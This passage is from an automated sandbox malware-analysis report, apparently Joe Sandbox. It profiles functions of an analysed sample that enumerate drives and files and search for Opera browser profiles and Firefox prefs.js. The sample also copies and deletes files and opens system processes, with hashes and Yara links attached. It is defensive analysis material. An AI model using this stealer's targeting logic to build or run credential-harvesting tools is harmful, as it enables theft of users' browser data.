                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00022336
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 000223A2
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 000223B6
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 000225DC
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002264F
                                                                                                                                                                                            • Part of subcall function 00036E97: Sleep.KERNEL32(000003E8,?,?), ref: 00036EFE
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 000226C6
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 000226DA
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 00031D92: GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                          • API String ID: 1475085387-1173974218
                                                                                                                                                                                          • Opcode ID: 88f3205139a102b0d1ca0a995b697ff966a6cd22056858cffb9935f747ca9d5e
                                                                                                                                                                                          • Instruction ID: 6c9d7d8cfc38a19f118cf9094d49f84ff6f112daaf5bbdc09fea2e84bd021ac9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88f3205139a102b0d1ca0a995b697ff966a6cd22056858cffb9935f747ca9d5e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B932B971941139ABCF62FB64ED56ACDB378AF44304F4141E1B908B7166DB30AF898F91
                                                                                                                                                                                          Function 0003543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wsprintfA.USER32 ref: 0003546A
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00035481
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056A80), ref: 000354A2
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056A84), ref: 000354BC
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 0003550D
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035520
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035534
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035547
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056A88), ref: 00035559
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 0003556D
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00035623
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00035637
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                          • String ID: %s\%s
                                                                                                                                                                                          • API String ID: 1150833511-4073750446
                                                                                                                                                                                          • Opcode ID: d95e98fdc789dbe54757c6efa3f56bea0c066dc9a5411c66577c5f7978edbabb
                                                                                                                                                                                          • Instruction ID: ea88b76d37f7ba3106e411422513325ba736f497d2cde40c58bdd9475ffe3b37
                                                                                                                                                                                          • Opcode Fuzzy Hash: d95e98fdc789dbe54757c6efa3f56bea0c066dc9a5411c66577c5f7978edbabb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04512BB590022C9BCF60DF60DC89AD9B7BCAB09305F4045E5A60CE3251EB31ABC9CF65
                                                                                                                                                                                          Function 0002BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,\*.*,0005682E,0002CC6B,?,?), ref: 0002BFC5
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057470), ref: 0002BFE5
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057474), ref: 0002BFFF
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera,00056843,00056842,00056837,00056836,00056833,00056832,0005682F), ref: 0002C08B
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0002C099
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0002C0A7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                          • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                          • API String ID: 2567437900-1710495004
                                                                                                                                                                                          • Opcode ID: ec3eba70b5732856b7f3c6797b5258f01e73d06003bbbf4432447df8affeac7d
                                                                                                                                                                                          • Instruction ID: ba868feaa2bb7455e52c24aea9561ff222c9b4c30d7f792a5eef50db08483bff
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec3eba70b5732856b7f3c6797b5258f01e73d06003bbbf4432447df8affeac7d
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD02E535941129ABDF62FB64ED56ADEB7B8AF04304F4141E1B908B7117DB30AF898F90
                                                                                                                                                                                          Function 00035142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 000351C2
                                                                                                                                                                                          • _memset.LIBCMT ref: 000351E5
                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(?), ref: 000351EE
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 0003520E
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 00035229
                                                                                                                                                                                            • Part of subcall function 00034CC8: wsprintfA.USER32 ref: 00034D1C
                                                                                                                                                                                            • Part of subcall function 00034CC8: FindFirstFileA.KERNEL32(?,?), ref: 00034D33
                                                                                                                                                                                            • Part of subcall function 00034CC8: _memset.LIBCMT ref: 00034D4F
                                                                                                                                                                                            • Part of subcall function 00034CC8: _memset.LIBCMT ref: 00034D60
                                                                                                                                                                                            • Part of subcall function 00034CC8: StrCmpCA.SHLWAPI(?,000569F8), ref: 00034D81
                                                                                                                                                                                            • Part of subcall function 00034CC8: StrCmpCA.SHLWAPI(?,000569FC), ref: 00034D9B
                                                                                                                                                                                            • Part of subcall function 00034CC8: wsprintfA.USER32 ref: 00034DC2
                                                                                                                                                                                            • Part of subcall function 00034CC8: StrCmpCA.SHLWAPI(?,0005660F), ref: 00034DD6
                                                                                                                                                                                            • Part of subcall function 00034CC8: wsprintfA.USER32 ref: 00034DFF
                                                                                                                                                                                            • Part of subcall function 00034CC8: _memset.LIBCMT ref: 00034E28
                                                                                                                                                                                            • Part of subcall function 00034CC8: lstrcatA.KERNEL32(?,?), ref: 00034E3D
                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 0003524A
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000352C4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                          • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                          • API String ID: 441469471-147700698
                                                                                                                                                                                          • Opcode ID: 3cc468b0e1d4a72856e747e0a3dac5897c108695d3861f1d74022660c98df013
                                                                                                                                                                                          • Instruction ID: 60cf78b0602a73336d21f5e7030a5fa533f9783f49c6278923d35c3632f2e8af
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cc468b0e1d4a72856e747e0a3dac5897c108695d3861f1d74022660c98df013
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A5108B1900218AFDF719F60DC85BEE7BB9FB05305F1041A5EA48A6112EB325E89CF65
                                                                                                                                                                                          Function 0002D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,00057570,000568A3,?,?,?), ref: 0002D647
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057574), ref: 0002D668
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057578), ref: 0002D682
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,prefs.js,0005757C,?,000568AE), ref: 0002D70E
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002D7E8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002D8B3
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 0002D956
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002D96A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                          • String ID: prefs.js
                                                                                                                                                                                          • API String ID: 893096357-3783873740
                                                                                                                                                                                          • Opcode ID: c268ab1a8570f0e95a1769065b9426c7b3043193f6fc7b98ecaf7cf45199b0f0
                                                                                                                                                                                          • Instruction ID: d9db74cd60bf7b0e2c541bf3bb9a38af60eae132a2b6495a23e3bd184261f6b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: c268ab1a8570f0e95a1769065b9426c7b3043193f6fc7b98ecaf7cf45199b0f0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 59A1E8769016289BDF61FB64EC46BCE7778AF04311F4141E1BD08B7252EB30AE898F91
                                                                                                                                                                                          Function 0002FB2D Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0002FB52
                                                                                                                                                                                          • OpenProcess.KERNEL32(t.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon,00000000,00000000), ref: 0002FB7E
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002FBC1
                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0002FD17
                                                                                                                                                                                            • Part of subcall function 0002F030: _memmove.LIBCMT ref: 0002F04A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • t.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon, xrefs: 0002FB5D
                                                                                                                                                                                          • N0ZWFt, xrefs: 0002FC7E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
